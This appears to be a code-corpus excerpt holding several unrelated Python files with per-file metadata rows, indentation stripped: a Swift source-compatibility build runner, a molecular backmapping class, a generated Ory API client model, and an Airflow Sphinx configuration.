output += (' Failed: %s' % len(fails)) + '\n'
output += (' XFailed: %s' % len(xfails)) + '\n'
output += (' UPassed: %s' % len(upasses)) + '\n'
output += (' Total: %s' % (len(fails) +
len(passes) +
len(xfails) +
len(upasses))) + '\n'
output += '='*40 + '\n'
output += 'Repository Summary:' + '\n'
output += ' Total: %s' % len(self.all()) + '\n'
output += '='*40 + '\n'
output += 'Result: ' + Result.__str__(self) + '\n'
output += '='*40
return output
class ProjectResult(ListResult):
pass
class VersionResult(ListResult):
pass
class ListBuilder(Factory):
def __init__(self, include, exclude, verbose, subbuilder, target):
self.include = include
self.exclude = exclude
self.verbose = verbose
self.subbuilder = subbuilder
self.target = target
def included(self, subtarget):
return True
def subtargets(self):
return self.target
def payload(self):
return []
def build(self, stdout=sys.stdout):
results = self.new_result()
for subtarget in self.subtargets():
if self.included(subtarget):
(log_filename, output_fd) = self.output_fd(subtarget)
subbuilder_result = None
try:
subbuilder_result = self.subbuilder(*([subtarget] + self.payload())).build(
stdout=output_fd
)
results.add(subbuilder_result)
finally:
if output_fd is not sys.stdout:
output_fd.close()
os.rename(
log_filename,
'%s_%s' % (subbuilder_result, log_filename),
)
return results
def new_result(self):
return ListResult()
def output_fd(self, subtarget):
return (None, sys.stdout)
class ProjectListBuilder(ListBuilder):
def included(self, subtarget):
project = subtarget
return (('platforms' not in project or
platform.system() in project['platforms']) and
included_element(self.include, self.exclude, project))
def new_result(self):
return ProjectListResult()
class ProjectBuilder(ListBuilder):
def payload(self):
return [self.target]
def included(self, subtarget):
version = subtarget
return included_element(self.include, self.exclude, version)
def subtargets(self):
return self.target['compatibility']
def new_result(self):
return ProjectResult()
class VersionBuilder(ListBuilder):
def __init__(self, include, exclude, verbose, subbuilder, target, project):
super(VersionBuilder, self).__init__(include, exclude, verbose, subbuilder, target)
self.project = project
def included(self, subtarget):
action = subtarget
return included_element(self.include, self.exclude, action)
def new_result(self):
return VersionResult()
def subtargets(self):
return self.project['actions']
def payload(self):
return [self.target, self.project]
def output_fd(self, subtarget):
scheme_target = dict_get(subtarget, 'scheme', 'target', default=False)
destination = dict_get(subtarget, 'destination', default=False)
project_identifier = dict_get(self.project, 'path', default="") + " " + \
dict_get(subtarget, 'project', default="").split('-')[0]
identifier = '_'.join(
[x.strip() for x in [project_identifier, self.target['version'], subtarget['action']]] +
([scheme_target] if scheme_target else []) +
([destination] if destination else [])
)
log_filename = re.sub(
r"[^\w\_\.]+", "-", identifier
).strip('-').strip('_') + '.log'
if self.verbose:
fd = sys.stdout
else:
fd = open(log_filename, 'w')
return (log_filename, fd)
class ActionBuilder(Factory):
def __init__(self, swiftc, swift_version, swift_branch,
sandbox_profile_xcodebuild,
sandbox_profile_package,
added_swift_flags,
added_xcodebuild_flags,
skip_clean, build_config,
strip_resource_phases,
project_cache_path,
action, project):
self.swiftc = swiftc
self.swift_version = swift_version
self.swift_branch = swift_branch
set_swift_branch(swift_branch)
self.sandbox_profile_xcodebuild = sandbox_profile_xcodebuild
self.sandbox_profile_package = sandbox_profile_package
self.project = project
self.action = action
self.root_path = common.private_workspace(project_cache_path)
self.current_platform = platform.system()
self.added_swift_flags = added_swift_flags
self.added_xcodebuild_flags = added_xcodebuild_flags
self.skip_clean = skip_clean
self.build_config = build_config
self.strip_resource_phases = strip_resource_phases
self.init()
def init(self):
pass
def build(self, stdout=sys.stdout):
self.checkout_branch(self.project['branch'],
stdout=stdout, stderr=stdout)
return self.dispatch(self.project['branch'],
stdout=stdout, stderr=stdout)
def checkout_branch(self, branch, stdout=sys.stdout, stderr=sys.stderr):
self.checkout(ref=branch, ref_is_sha=False, pull_after_update=True,
stdout=stdout, stderr=stderr)
def checkout_sha(self, sha, stdout=sys.stdout, stderr=sys.stderr):
self.checkout(ref=sha, ref_is_sha=True, pull_after_update=False,
stdout=stdout, stderr=stderr)
def checkout(self, ref, ref_is_sha, pull_after_update,
stdout=sys.stdout, stderr=sys.stderr):
if not os.path.exists(self.root_path):
common.check_execute(['mkdir', '-p', self.root_path],
stdout=stdout, stderr=stderr)
path = os.path.join(self.root_path, self.project['path'])
if self.project['repository'] == 'Git':
if os.path.exists(path):
if ref_is_sha:
common.git_update(self.project['url'], ref, path,
incremental=self.skip_clean,
stdout=stdout, stderr=stderr)
else:
if not self.skip_clean:
common.git_clean(path, stdout=stdout, stderr=stderr)
common.git_checkout(ref, path,
force=True,
stdout=stdout, stderr=stderr)
if pull_after_update:
common.git_pull(path, stdout=stdout, stderr=stderr)
else:
common.git_clone(self.project['url'], path, ref,
stdout=stdout, stderr=stderr)
else:
raise common.Unreachable('Unsupported repository: %s' %
self.project['repository'])
def dispatch(self, identifier, stdout=sys.stdout, stderr=sys.stderr):
try:
dispatch(self.root_path, self.project, self.action,
self.swiftc,
self.swift_version,
self.sandbox_profile_xcodebuild,
self.sandbox_profile_package,
self.added_swift_flags,
self.added_xcodebuild_flags,
self.build_config,
incremental=self.skip_clean,
stdout=stdout, stderr=stderr)
except common.ExecuteCommandFailure as error:
return self.failed(identifier, error)
else:
return self.succeeded(identifier)
def failed(self, identifier, error):
if 'xfail' in self.action:
error_str = 'XFAIL: %s: %s' % (identifier, error)
result = ActionResult(Result.XFAIL, error_str)
else:
error_str = 'FAIL: %s: %s' % (identifier, error)
result = ActionResult(Result.FAIL, error_str)
common.debug_print(error_str)
return result
def succeeded(self, identifier):
if 'xfail' in self.action:
error_str = 'UPASS: %s: %s' % (identifier, self.action)
result = ActionResult(Result.UPASS, error_str)
else:
error_str = 'PASS: %s: %s' % (identifier, self.action)
result = ActionResult(Result.PASS, error_str)
common.debug_print(error_str)
return result
class CompatActionBuilder(ActionBuilder):
def __init__(self,
swiftc, swift_version, swift_branch,
sandbox_profile_xcodebuild,
sandbox_profile_package,
added_swift_flags,
added_xcodebuild_flags,
skip_clean, build_config,
strip_resource_phases,
only_latest_versions,
project_cache_path,
action, version, project):
super(CompatActionBuilder, self).__init__(
swiftc, swift_version, swift_branch,
sandbox_profile_xcodebuild,
sandbox_profile_package,
added_swift_flags,
added_xcodebuild_flags,
skip_clean, build_config,
strip_resource_phases,
project_cache_path,
action, project
)
self.only_latest_versions = only_latest_versions
self.version = version
def dispatch(self, identifier, stdout=sys.stdout, stderr=sys.stderr):
if self.only_latest_versions:
if self.version['version'] != \
sorted(self.project['compatibility'],
reverse=True,
key=lambda x: [float(y) for y in x['version'].split('.')])[0]['version']:
return None
if not self.swift_version:
self.swift_version = self.version['version']
try:
dispatch(self.root_path, self.project, self.action,
self.swiftc,
self.swift_version,
self.sandbox_profile_xcodebuild,
self.sandbox_profile_package,
self.added_swift_flags,
self.added_xcodebuild_flags,
self.build_config,
incremental=self.skip_clean,
should_strip_resource_phases=self.strip_resource_phases,
stdout=stdout, stderr=stderr)
except common.ExecuteCommandFailure as error:
return self.failed(identifier, error)
else:
return self.succeeded(identifier)
def build(self, stdout=sys.stdout):
scheme_target = dict_get(self.action, 'scheme', 'target', default=False)
# FIXME: Why isn't this used?
identifier = ': '.join(
[self.project['path'], self.version['version'], self.action['action']] +
([scheme_target] if scheme_target else [])
)
if len(self.version['commit']) != 40:
common.debug_print("ERROR: Commits must be 40 character SHA hashes")
exit(1)
self.checkout_sha(
self.version['commit'],
stdout=stdout, stderr=stdout
)
action_result = self.dispatch('%s, %s' % (self.version['version'], self.version['commit'][:6]),
stdout=stdout, stderr=stdout)
return action_result
def failed(self, identifier, error):
version_commit = self.version['commit'][:6]
bug_identifier = None
build_config = self.build_config if self.build_config else self.action.get('configuration', None)
if 'xfail' in self.action:
bug_identifier = is_xfailed(self.action['xfail'],
self.version['version'],
self.current_platform,
self.swift_branch,
build_config)
if bug_identifier:
error_str = 'XFAIL: {bug}, {project}, {compatibility}, {commit}, {action_target}'.format(
bug=bug_identifier,
project=self.project['path'],
compatibility=self.version['version'],
commit=version_commit,
action_target = dict_get(self.action, 'scheme', 'target', default="Swift Package")
)
if 'destination' in self.action:
error_str += ', ' + self.action['destination']
result = ActionResult(Result.XFAIL, error_str)
else:
error_str = 'FAIL: {project}, {compatibility}, {commit}, {action_target}'.format(
project=self.project['path'],
compatibility=self.version['version'],
commit=version_commit,
action_target = dict_get(self.action, 'scheme', 'target', default="Swift Package")
)
if 'destination' in self.action:
error_str += ', ' + self.action['destination']
result = ActionResult(Result.FAIL, error_str)
common.debug_print(error_str)
return result
def succeeded(self, identifier):
version_commit = self.version['commit'][:6]
bug_identifier = None
build_config = self.build_config if self.build_config else self.action.get('configuration', None)
if 'xfail' in self.action:
bug_identifier = is_xfailed(self.action['xfail'],
self.version['version'],
self.current_platform,
self.swift_branch,
build_config)
if bug_identifier:
error_str = 'UPASS: {bug}, {project}, {compatibility}, {commit}, {action_target}'.format(
bug=bug_identifier,
project=self.project['path'],
compatibility=self.version['version'],
commit=version_commit,
action_target = dict_get(self.action, 'scheme', 'target', default="Swift Package")
)
if 'destination' in self.action:
error_str += ', ' + self.action['destination']
result = ActionResult(Result.UPASS, error_str)
else:
error_str = 'PASS: {project}, {compatibility}, {commit}, {action_target}'.format(
project=self.project['path'],
compatibility=self.version['version'],
commit=version_commit,
action_target = dict_get(self.action, 'scheme', 'target', default="Swift Package")
)
if 'destination' in self.action:
error_str += ', ' + self.action['destination']
result = ActionResult(Result.PASS, error_str)
common.debug_print(error_str)
return result
class EarlyExit(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def ignore_missing(f):
if (f.endswith('.dia') or
f.endswith('~')):
return True
return False
def ignore_diff(f):
if (f.endswith('-master.swiftdeps') or
f.endswith('dependency_info.dat')):
return True
return False
def have_same_trees(full, incr, d):
ok = True
for f in d.left_only:
if ignore_missing(f):
continue
ok = False
common.debug_print("Missing 'incr' file: %s"
% os.path.relpath(os.path.join(d.left, f), full))
for f in d.right_only:
if ignore_missing(f):
continue
ok = False
common.debug_print("Missing 'full' file: %s"
% os.path.relpath(os.path.join(d.right, f), incr))
for f in d.diff_files:
if ignore_diff(f):
continue
ok = False
common.debug_print("File difference: %s"
% os.path.relpath(os.path.join(d.left, f), full))
for sub in d.subdirs.values():
ok = have_same_trees(full, incr, sub) and ok
return ok
class IncrementalActionBuilder(ActionBuilder):
def __init__(self, swiftc, swift_version, swift_branch,
sandbox_profile_xcodebuild,
sandbox_profile_package,
added_swift_flags, build_config,
strip_resource_phases,
project, action):
super(IncrementalActionBuilder,
self).__init__(swiftc, swift_version, swift_branch,
sandbox_profile_xcodebuild,
sandbox_profile_package,
added_swift_flags,
skip_clean=True,
build_config=build_config,
strip_resource_phases=strip_resource_phases,
project=project,
action=action)
self.proj_path = os.path.join(self.root_path, self.project['path'])
self.incr_path = self.proj_path + "-incr"
def curr_build_state_path(self):
if self.action['action'] == 'BuildSwiftPackage':
return os.path.join(self.proj_path, ".build")
match = re.match(r'^(Build|Test)Xcode(Workspace|Project)(Scheme|Target)$',
self.action['action'])
if match:
project_path = os.path.join(self.proj_path,
self.action[match.group(2).lower()])
return os.path.join(os.path.dirname(project_path), "build")
else:
raise Exception("Unsupported action: " + self.action['action'])
def ignored_differences(self):
if self.action['action'] == 'BuildSwiftPackage':
return ['ModuleCache', 'build.db', 'master.swiftdeps', 'master.swiftdeps~']
elif re.match(r'^(Build|Test)Xcode(Workspace|Project)(Scheme|Target)$',
self.action['action']):
return ['ModuleCache', 'Logs', 'info.plist', 'dgph', 'dgph~',
'master.swiftdeps', 'master.swiftdeps~']
else:
raise Exception("Unsupported action: " + self.action['action'])
def expect_determinism(self):
# We're not seeing determinism in incremental builds yet, so
# for the time being disable the expectation.
return False
def saved_build_state_path(self, seq, flav, sha):
return os.path.join(self.incr_path, ("build-state-%03d-%s-%.7s" %
(seq, flav, sha)))
def restore_saved_build_state(self, seq, flav, sha, stdout=sys.stdout):
src = self.saved_build_state_path(seq, flav, sha)
dst = self.curr_build_state_path()
proj = self.project['path']
common.debug_print("Restoring %s build-state #%d of %s from %s" %
(flav, seq, proj, src), stderr=stdout)
if os.path.exists(dst):
shutil.rmtree(dst)
shutil.copytree(src, dst, symlinks=True)
def save_build_state(self, seq, flav, sha, stdout=sys.stdout):
src = self.curr_build_state_path()
dst = self.saved_build_state_path(seq, flav, sha)
proj = self.project['path']
common.debug_print("Saving %s state #%d of %s to %s" %
(flav, seq, proj, dst), stderr=stdout)
if os.path.exists(dst):
shutil.rmtree(dst)
shutil.copytree(src, dst, symlinks=True)
def check_full_vs_incr(self, seq, sha, stdout=sys.stdout):
full = self.saved_build_state_path(seq, 'full', sha)
incr = self.saved_build_state_path(seq, 'incr', sha)
common.debug_print("Comparing dirs %s vs. %s" % (os.path.relpath(full),
os.path.basename(incr)),
stderr=stdout)
d = filecmp.dircmp(full, incr, self.ignored_differences())
if not have_same_trees(full, incr, d):
message = ("Dirs differ: %s vs. %s" %
(os.path.relpath(full),
os.path.basename(incr)))
if self.expect_determinism():
raise EarlyExit(ActionResult(Result.FAIL, message))
else:
common.debug_print(message, stderr=stdout)
def excluded_by_limit(self, limits):
for (kind, value) in limits.items():
if self.action.get(kind) != value:
return True
return False
def build(self, stdout=sys.stdout):
action_result = ActionResult(Result.PASS, "")
try:
if 'incremental' in self.project:
for vers in self.project['incremental']:
incr = self.project['incremental'][vers]
if 'limit' in incr and self.excluded_by_limit(incr['limit']):
continue
ident = "%s-incr-%s" % (self.project['path'], vers)
action_result = self.build_incremental(ident,
incr['commits'],
stdout=stdout)
except EarlyExit as error:
action_result = error.value
return action_result
def dispatch(self, identifier, incremental, stdout=sys.stdout, stderr=sys.stderr):
try:
dispatch(self.root_path, self.project, self.action,
self.swiftc,
self.swift_version,
self.sandbox_profile_xcodebuild,
self.sandbox_profile_package,
self.added_swift_flags,
self.added_xcodebuild_flags,
self.build_config,
should_strip_resource_phases=False,
stdout=stdout, stderr=stderr,
incremental=incremental)
except common.ExecuteCommandFailure as error:
return self.failed(identifier, error)
else:
return self.succeeded(identifier)
def dispatch_or_raise(self, identifier, incremental,
stdout=sys.stdout, stderr=sys.stderr):
time.sleep(2)
action_result = self.dispatch(identifier, incremental=incremental,
stdout=stdout, stderr=stderr)
time.sleep(2)
if action_result.result not in [ResultEnum.PASS,
ResultEnum.XFAIL]:
raise EarlyExit(action_result)
return action_result
def build_incremental(self, identifier, commits, stdout=sys.stdout):
if os.path.exists(self.incr_path):
shutil.rmtree(self.incr_path)
os.makedirs(self.incr_path)
prev = None
seq = 0
action_result = ActionResult(Result.PASS, "")
for sha in commits:
proj = self.project['path']
ident = "%s-%03d-%.7s" % (identifier, seq, sha)
if prev is None:
common.debug_print("Doing full build #%03d of %s: %.7s" %
(seq, proj, sha), stderr=stdout)
self.checkout_sha(sha, stdout=stdout, stderr=stdout)
action_result = self.dispatch_or_raise(ident, incremental=False,
stdout=stdout, stderr=stdout)
self.save_build_state(seq, 'full', sha, None, stdout=stdout)
else:
common.debug_print("Doing incr build #%d of %s: %.7s -> %.7s" %
(seq, proj, prev, sha), stderr=stdout)
common.git_checkout(sha, self.proj_path, stdout=stdout, stderr=stdout)
common.git_submodule_update(self.proj_path, stdout=stdout, stderr=stdout)
action_result = self.dispatch_or_raise(ident, incremental=True,
stdout=stdout, stderr=stdout)
self.save_build_state(seq, 'incr', sha, stdout=stdout)
prev = sha
seq += 1
return action_result
| 40.458121
| 110
| 0.532449
|
eb3a533ac99112849b4b8385b6346b1f2dc1f97e
| 1,487
|
py
|
Python
|
backmap/backmapping.py
|
oliviadunne/backmap
|
e2f6ad0d644075cf24dac2b21c49279989cc194f
|
[
"MIT"
] | null | null | null |
backmap/backmapping.py
|
oliviadunne/backmap
|
e2f6ad0d644075cf24dac2b21c49279989cc194f
|
[
"MIT"
] | null | null | null |
backmap/backmapping.py
|
oliviadunne/backmap
|
e2f6ad0d644075cf24dac2b21c49279989cc194f
|
[
"MIT"
] | null | null | null |
"""
backmapping.py
Backmapping for molecules
Handles the primary functions
##
TODO
----
-> Generalize to arbitrary number of different types and number of molecules
"""
import mdtraj as md
import numpy as np
from .utils import parse_AA_pdb, parse_CG_pdb
from .COM_backmap import COM_backmap
__all__ = ["Backmapping"]
class Backmapping():
def __init__(self, CG_pdb_f_name, AA_pdb_f_name):
self.CG_pdb_f_name = CG_pdb_f_name
self.AA_pdb_f_name = AA_pdb_f_name
self.CG_trj = md.load_pdb(filename=self.CG_pdb_f_name).remove_solvent()
self.CG_top = self.CG_trj.top
self.AA_trj = md.load_pdb(filename=self.AA_pdb_f_name).remove_solvent()
self.AA_top = self.AA_trj.top
self.CG_beads = parse_CG_pdb(self.CG_pdb_f_name)
self.AA_beads = parse_AA_pdb(self.AA_pdb_f_name)
def backmap(self, struct_fname, output_f_name=None, mode='COM'):
if output_f_name is None:
self.output_f_name = struct_fname.split(".")[0] + "_backmapped.pdb"
else:
self.output_f_name = output_f_name
self.CG_struct = md.load(struct_fname)
if mode == 'COM':
self.AA_new_trj = COM_backmap(self.CG_struct, self.AA_trj, self.CG_beads, self.AA_beads)
else:
raise NotImplementedError("Only 'COM' backmapping is supported")
print(f"Writing output to {self.output_f_name}")
self.AA_new_trj.save_pdb(self.output_f_name)
return self.AA_new_trj
| 31.638298
| 100
| 0.694015
|
4aaa272ee56bc88acb88a06c9da41b53f6c7b241
| 6,948
|
py
|
Python
|
clients/client/python/ory_client/model/ui_node_anchor_attributes.py
|
simoneromano96/sdk
|
a6113d0daefbbb803790297e4b242d4c7cbbcb22
|
[
"Apache-2.0"
] | null | null | null |
clients/client/python/ory_client/model/ui_node_anchor_attributes.py
|
simoneromano96/sdk
|
a6113d0daefbbb803790297e4b242d4c7cbbcb22
|
[
"Apache-2.0"
] | null | null | null |
clients/client/python/ory_client/model/ui_node_anchor_attributes.py
|
simoneromano96/sdk
|
a6113d0daefbbb803790297e4b242d4c7cbbcb22
|
[
"Apache-2.0"
] | null | null | null |
"""
Ory APIs
Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers. # noqa: E501
The version of the OpenAPI document: v0.0.1-alpha.9
Contact: support@ory.sh
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from ory_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from ory_client.model.ui_text import UiText
globals()['UiText'] = UiText
class UiNodeAnchorAttributes(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'href': (str,), # noqa: E501
'title': (UiText,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'href': 'href', # noqa: E501
'title': 'title', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, href, title, *args, **kwargs): # noqa: E501
"""UiNodeAnchorAttributes - a model defined in OpenAPI
Args:
href (str): The link's href (destination) URL. format: uri
title (UiText):
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.href = href
self.title = title
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
| 38.6
| 194
| 0.585204
|
0f9ad066ab94e54a9887bd7953a206d80eb27a7e
| 13,525
|
py
|
Python
|
docs/conf.py
|
jvermeire/incubator-airflow
|
07e77e965d8396f5f1dedf786ec9d398cc668a49
|
[
"Apache-2.0"
] | 1
|
2020-06-16T17:26:28.000Z
|
2020-06-16T17:26:28.000Z
|
docs/conf.py
|
sonal-raj/airflow
|
c63ddccf8de2b702d796dc5ccaf398c8062295f6
|
[
"Apache-2.0"
] | null | null | null |
docs/conf.py
|
sonal-raj/airflow
|
c63ddccf8de2b702d796dc5ccaf398c8062295f6
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# flake8: noqa
# Disable Flake8 because of all the sphinx imports
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Airflow documentation build configuration file, created by
# sphinx-quickstart on Thu Oct 9 20:50:01 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
import airflow
autodoc_mock_imports = [
'MySQLdb',
'adal',
'analytics',
'azure',
'azure.cosmos',
'azure.datalake',
'azure.mgmt',
'boto3',
'botocore',
'bson',
'cassandra',
'celery',
'cloudant',
'cryptography',
'cx_Oracle',
'datadog',
'distributed',
'docker',
'google',
'google_auth_httplib2',
'googleapiclient',
'grpc',
'hdfs',
'httplib2',
'jaydebeapi',
'jenkins',
'jira',
'kubernetes',
'mesos',
'msrestazure',
'pandas',
'pandas_gbq',
'paramiko',
'pinotdb',
'psycopg2',
'pydruid',
'pyhive',
'pyhive',
'pymongo',
'pymssql',
'pysftp',
'qds_sdk',
'redis',
'simple_salesforce',
'slackclient',
'smbclient',
'snowflake',
'sshtunnel',
'tenacity',
'vertica_python',
'winrm',
'zdesk',
]
# Hack to allow changing for piece of the code to behave differently while
# the docs are being built. The main objective was to alter the
# behavior of the utils.apply_default that was hiding function headers
os.environ['BUILDING_AIRFLOW_DOCS'] = 'TRUE'
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.join(os.path.dirname(__file__), 'exts'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinxarg.ext',
'sphinxcontrib.httpdomain',
'sphinx.ext.intersphinx',
'autoapi.extension',
'exampleinclude',
'docroles'
]
autodoc_default_options = {
'show-inheritance': True,
'members': True
}
viewcode_follow_imported_members = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Airflow'
# copyright = u''
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# version = '1.0.0'
version = airflow.__version__
# The full version, including alpha/beta/rc tags.
# release = '1.0.0'
release = airflow.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
'_api/airflow/_vendor',
'_api/airflow/api',
'_api/airflow/bin',
'_api/airflow/config_templates',
'_api/airflow/configuration',
'_api/airflow/contrib/auth',
'_api/airflow/contrib/example_dags',
'_api/airflow/contrib/index.rst',
'_api/airflow/contrib/kubernetes',
'_api/airflow/contrib/task_runner',
'_api/airflow/contrib/utils',
'_api/airflow/dag',
'_api/airflow/default_login',
'_api/airflow/example_dags',
'_api/airflow/exceptions',
'_api/airflow/index.rst',
'_api/airflow/jobs',
'_api/airflow/lineage',
'_api/airflow/logging_config',
'_api/airflow/macros',
'_api/airflow/migrations',
'_api/airflow/plugins_manager',
'_api/airflow/security',
'_api/airflow/settings',
'_api/airflow/stats',
'_api/airflow/task',
'_api/airflow/ti_deps',
'_api/airflow/utils',
'_api/airflow/version',
'_api/airflow/www',
'_api/main',
'autoapi_templates',
'howto/operator/gcp/_partials',
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
keep_warnings = True
intersphinx_mapping = {
'boto3': ('https://boto3.amazonaws.com/v1/documentation/api/latest/', None),
'google-cloud-python': (
'https://googleapis.github.io/google-cloud-python/latest/', None),
'mongodb': ('https://api.mongodb.com/python/current/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'python': ('https://docs.python.org/3/', None),
'requests': ('http://docs.python-requests.org/en/master/', None),
'sqlalchemy': ('https://docs.sqlalchemy.org/en/latest/', None),
}
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
import sphinx_rtd_theme
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "Airflow Documentation"
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = ""
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
